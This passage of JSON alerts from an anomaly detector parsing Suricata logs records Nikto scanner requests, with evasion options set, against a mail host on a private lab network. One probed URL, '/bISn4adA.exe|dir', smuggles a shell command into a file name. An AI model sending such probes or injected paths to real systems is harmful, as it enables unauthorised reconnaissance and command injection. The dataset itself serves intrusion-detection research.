"," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.316954+0000\",\"flow_id\":1437349444244092,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.318931 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46918 -> 192.168.10.154:80", "/parser/model/time": 1583349514.318931, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46918, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.318931 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46918 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.html~", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.319109+0000\",\"flow_id\":2026627547191976,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.319109, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2026627547191976,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.html~\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.html~\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.html~", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.html~", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", 
"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46918, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2026627547191976,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2026627547191976, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.319109+0000\",\"flow_id\":2026627547191976,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.321065 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46920 -> 192.168.10.154:80", "/parser/model/time": 1583349514.321065, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 
3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46920, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.321065 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46920 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.exe|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.321278+0000\",\"flow_id\":1783528103273160,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.321278, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":1783528103273160,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.exe|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.exe|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.exe|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.exe|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46920, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1783528103273160,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1783528103273160, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.321278+0000\",\"flow_id\":1783528103273160,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.324976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46922 -> 192.168.10.154:80", "/parser/model/time": 1583349514.324976, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol 
Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46922, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.324976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46922 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.325456+0000\",\"flow_id\":1513189976763438,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.325456, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1513189976763438,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
